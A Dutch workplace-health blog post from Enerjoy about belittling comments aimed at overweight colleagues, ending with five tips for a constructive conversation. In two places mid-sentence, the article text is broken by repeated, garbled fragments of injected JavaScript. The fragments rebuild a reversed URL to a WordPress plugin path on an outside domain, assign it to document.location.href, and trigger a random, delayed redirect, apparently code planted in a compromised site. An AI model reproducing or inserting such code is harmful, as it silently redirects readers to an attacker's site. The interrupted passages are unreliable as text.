x

Copyright: Takeaway

Ha, eindelijk de lang verwachte lunchpauze! Je besluit jezelf te belonen met een broodje bal met jus. Je legt net het broodje op je dienblad als je collega zegt: ‘Goh, zou je dat nou wel doen?’ terwijl hij naar het broodje wijst en dan naar je buik. Bij het afrekenen hoor je iemand achter je met gedempte stem zeggen: ‘Ja hoor dikkie dik heeft weer een broodje bal, het zou ook eens niet.’
Dit zijn enkele voorbeelden van destructief gedrag waarmee werknemers met overgewicht te maken krijgen. Hoewel de opmerkingen en handelingen vaak niet kwaad bedoeld zijn, kunnen deze opmerkingen ernstige gevolgen hebben voor werknemers met overgewicht of obesitas.

Onveilige omgeving

Voor werknemers met (ernstig) overgewicht is een omgeving waar zij worden beoordeeld en veroordeeld een extra obstakel om af te vallen. Kritische opmerkingen zorgen voor een somber en negatief gevoel. Om dit te compenseren grijpen zij juist naar ongezond eten. Zo ontstaat er een neerwaartse spiraal waarin werknemers blijven aankomen en zich steeds rotter gaat voelen.

De neerwaartse spiraal van en angstcultuur

Wanneer dit gedrag regelmatig voorkomt, zullen de geplaagde werknemers zich vaker eenzaam voelen, vaker last hebben van lichamelijke klachten en minder graag naar het werk gaan. Uiteindelijk kan dit leiden toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot overspannenheid en depressie.
Het mag duidelijk zijn dat ook de werkgever negatieve effecten ondervindt van dit gedrag. De werknemers met (ernstig) overgewicht zijn minder productief en krijgen vaker te maken met ziekteverzuim en een langere verzuimperiode.

Creëer een veilige sfeer

Natuurlijk is een gezonde leefstijl de oplossing om af te vallen. Maar als je je somber voelt door de neerbuigende opmerkingen van je collega’s is het extra lastig om gezond te eten. Het achterliggende probleem moet eerst worden opgelost voordat het afvallen weer succesvol is.
De eerste stap die moet worden ondernomen is het creëren van een veilige sfeer. Daarnaast is het belangrijk om het onderwerp overgewicht en (on)gezond eetgedrag voor iedereen bespreekbaar te maken. Een gesprek die constructief en opbouwend is.

Vijf tips om constructief een gesprek aan te gaan

  1. Zorg voor een goede timing. Het is niet slim om in het moment zelf (dus als iemand een broodje bal in zijn handen heeft) het gesprek aan te gaan. Je collega voelt zich dan voor het blok gezet. Kies na de maaltijd een rustig moment uit, zodoende voorkom je dat negatieve emoties in de weg staan.
  2. Kies een plek die privacy en een veilige sfeer garandeert.
  3. Oordeel niet. Zorg dat je vertelt vanuit observaties die jij hebt gedaan. Als je oordeelt zal je gesprekspartner in de verdediging schieten en komt het gesprek niet op gang. Zeg bijvoorbeeld. Ik zag dat je tijdens de lunch een broodje bal had genomen.
  4. Zorg voor een dialoog. Geef je gesprekspartner een kans om te reageren en ga respectvol met zijn reactie om. Vraag ook om het gesprek op gang te helpen naar de gevoelens en ervaringen van je collega.
  5. Laat weten dat je wilt helpen. Ook al heeft je gesprekspartner op het moment geen behoefte aan hulp. Het is voor hem of haar een prettig idee om te weten dat je collega’s je willen helpen.

Het constructieve gesprek is niet alleen inzetbaar voor het bespreekbaar maken van overgewicht, obesitas en een gezonde leefstijl. Het is een middel dat toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepasbaar is op allerlei lastig bespreekbare onderwerpen. Het aanspreken op ongezond en onveilig gedrag zal sfeer in het bedrijf een stuk aangenamer maken!
Zorg dat jouw werknemers op een juiste manier een constructief gesprek kunnen aanknopen met hun collega’s doormiddel van de workshop ‘Aanspreken op ongezond gedrag’.

Support nodig?

Nieuwsgierig naar hoe Enerjoy jouw bedrijf met onderscheidende interventies kan ondersteunen? Lees meer over onze activiteiten of neem direct contact met ons op. Wij denken graag gratis & vrijblijvend met je mee!
[clear]
[message_box]Bibianne Conijn | EnerjoyDit artikel is geschreven door:
Bibianne Conijn
Diëtist i.o.

Vind je dit artikel interessant? Deel het via LinkedIn, Twitter of Facebook!

Hoe zou jij je collega met overgewicht erop wijzen dat de het eten wat hij nuttigt ongezond is? Jouw inbreng is van harte welkom! [/message_box]